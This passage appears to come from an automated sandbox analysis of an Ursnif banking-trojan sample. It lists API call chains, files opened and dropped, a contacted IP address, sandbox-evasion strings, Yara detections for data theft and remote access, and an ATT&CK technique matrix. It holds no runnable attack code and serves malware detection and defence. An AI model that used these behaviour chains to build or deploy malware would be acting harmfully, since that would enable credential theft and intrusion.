            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BE258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_02BE258E
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: wscript.exe, 00000000.00000002.828666273.0000022D6CE80000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000003.821941342.0000022D69F67000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.828666273.0000022D6CE80000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.828666273.0000022D6CE80000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000003.810134979.0000022D69F00000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.828666273.0000022D6CE80000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF1BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_72FF1BB9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7302E4D0 mov eax, dword ptr fs:[00000030h]3_2_7302E4D0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7302E406 mov eax, dword ptr fs:[00000030h]3_2_7302E406
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7302E010 push dword ptr fs:[00000030h]3_2_7302E010
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF1E95 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,3_2_72FF1E95

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: share.pea.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187Jump to behavior
            Source: regsvr32.exe, 00000002.00000002.1192048299.0000000001980000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1193329977.0000000003590000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000002.00000002.1192048299.0000000001980000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1193329977.0000000003590000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000002.00000002.1192048299.0000000001980000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1193329977.0000000003590000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000002.00000002.1192048299.0000000001980000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1193329977.0000000003590000.00000002.00000001.sdmpBinary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_72FF1E58
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BE350A cpuid 3_2_02BE350A
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF1BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_72FF1BB9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BE350A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_02BE350A
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF177C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_72FF177C
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation31Winlogon Helper DLLProcess Injection12Masquerading11Credential DumpingSystem Time Discovery1Remote File Copy3Data from Local SystemData Encrypted1Standard Cryptographic Protocol12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Replication Through Removable MediaScripting121Port MonitorsAccessibility FeaturesVirtualization/Sandbox Evasion1Network SniffingVirtualization/Sandbox Evasion1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            External Remote ServicesExecution through API2Accessibility FeaturesPath InterceptionProcess Injection12Input CaptureProcess Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Drive-by CompromiseExploitation for Client Execution1System FirmwareDLL Search Order HijackingScripting121Credentials in FilesAccount Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol4SIM Card SwapPremium SMS Toll Fraud
            Exploit Public-Facing ApplicationGraphical User Interface1Shortcut ModificationFile System Permissions WeaknessFile Deletion1Account ManipulationSystem Owner/User Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information2Brute ForceSecurity Software Discovery11Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
            Spearphishing AttachmentScriptingPath InterceptionScheduled TaskDLL Side-Loading1Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistoryFile and Directory Discovery3Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptSystem Information Discovery46Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 241209